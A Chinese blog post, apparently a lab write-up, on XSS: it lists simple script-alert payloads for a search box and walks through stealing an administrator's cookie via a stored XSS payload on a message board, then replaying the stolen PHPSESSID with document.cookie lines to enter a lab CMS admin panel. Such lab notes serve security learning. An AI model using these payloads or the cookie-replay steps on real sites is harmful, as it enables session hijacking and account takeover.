首页 > 其他分享 >XSS(0628)

XSS(0628)

时间:2023-06-29 17:23:41浏览次数:41  
标签:XSS xss admin userid cookie document 0628

xss盲打

# 搜索框中搜索
<script>alert(/xss/)</script>
<script>confirm(/xss/);</script>
<script>confirm('xss');</script>
<script>prompt('xss');</script>

image-20230629162411962.png

固定会话攻击

进入xss平台创建项目

image-20230629162952488.png

image-20230629163148079.png

项目配置完成后打开项目代码

image-20230629163426204.png

image-20230629163426204

将代码插入到可能存在xss漏洞的位置,进行留言,将代码插入到留言板

image-20230629163617652.png

等待管理员查看

image-20230629163659012.png

回到xss平台查看cookie信息

image-20230629163931492.png

将获取到的cookie写入浏览器

cookie : 
username=admin; 
userid=1; 
PHPSESSID=4nlh6i2au2qpufav4qh5triel0

将得到的cookie输入到浏览器中,即可进入后台

document.cookie="username=admin";
document.cookie="userid=1";
document.cookie="PHPSESSID=4nlh6i2au2qpufav4qh5triel0";

image-20230629165116834.png

然后直接访问10.4.7.130/cms/admin/

image-20230629165136070.png

进入成功

标签:XSS,xss,admin,userid,cookie,document,0628
From: https://www.cnblogs.com/W-xzg/p/17514717.html

相关文章

  • SSO2.0 17-20230628
                 ......
  • 20230628习题总结
    1.P6891[JOISC2020]ビルの飾り付け4本题如果按照最直接的方式dp时空都是\(O(n^2)\)。可以用一个常用的优化:交换下标和值,用dp数组维护一个集合(可以证明是一个区间,于是用左右端点表示)。2.P7216[JOISC2020]美味しい美味しいハンバーグ正解是2-SAT,但是太麻烦,码量大难想。其......
  • 20230628
    最近忙了三四个的准备去参展的项目被取消了,领导没有正面通知,听负责采购的同事说的,采购关于展会用的物料被拒批,忙了几个月,突然一下松了下来来,这几天基本上都是摸摸鱼,工作状态一下一下子,松懈了下来。今天看到一个博客园的哥们的在博客园上分享了近十年的经历,感觉挺有意思的,我关注了......
  • 20230628水题选做
    约束条件题意给定一些关系\(x=y或x\neqy\)。求是否能满足。分析显然并查集。我们考虑将约束条件排序,先使形如\(x_{i}=x_{j}\)的\(x_{i}\)和\(x_{j}\)合并。而后我们观察是否存在\(x_{i}\)和\(x_{j}\)已经合并但是关系是\(\neq\)。代码#include<bits/stdc++.h>usingname......
  • xss漏洞攻击复现(xssgame靶场通关)
     这篇文章简单的介绍下xssgame的通关方法,从名字可以看出,xssgame就是针对xss攻击进行专门的漏洞复现,由易到难。 链接:https://pan.baidu.com/s/1F9I7iBdu7MPLLvegM5kAQg 提取码:469c 这是xssgame的安装包,将它放到phpstudy/WWW文件夹下访问即可 第一关 这一关没有任......
  • 跨站脚本攻击XSS(二)
    一、跨站脚本攻击XSS概述XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、VBScript、ActiveX、Flash或者甚至是普通的HTML。......
  • 代码审计——XSS详解
    01漏洞描述跨站脚本入侵(CrossSiteScript)是一种将恶意JavaScript代码插入到其他Web用户页面里执行以达到入侵目的的漏洞。入侵者利用应用程序的动态展示数据功能,在html页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在html中的恶意代码会被执行,用户浏览器被入侵者控制,从而达到......
  • XSSFClientAnchor 设置偏移无效 setDx setDy
    一、XSSFClientAnchor设置偏移无效setDxsetDy 原因是因为setDx,setDy所需要的x值y值并不是sheet.getColumnWidth(colNo)的值和row.getHeight()的值,而是需要进行一些转换。由于转换系数比较大,所以一般设个几百上千做测试基本是没反应,看起来就像没设置一样。这里先提供一下思......
  • DVWA靶场之XSS通关详解
    原理XSS漏洞是攻击者将恶意代码注入到合法网页中,当用户浏览该页面时,恶意代码会被执行,从而获取用户敏感信息或进行其他攻击。形成原因网站对用户输入数据的过滤不严格或不完备,攻击者可以根据这个漏洞向网站提交恶意代码,然后再将这些代码传播给其他用户,从而造成危害。防御措施......
  • XSS的攻击和怎么防止XSS的攻击
    XSS:CrossSiteScripting【跨站脚本攻击】一、概念黑客向HTML文件或者DOM中添加恶意脚本从而在用户浏览页面时利用插入的恶意代码,对用户实施攻击二、分类存储型XSS攻击黑客向存在漏洞的服务器插入一段恶意JavaScript代码当用户向服务器请求资源的时候就会请求到该恶意J......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99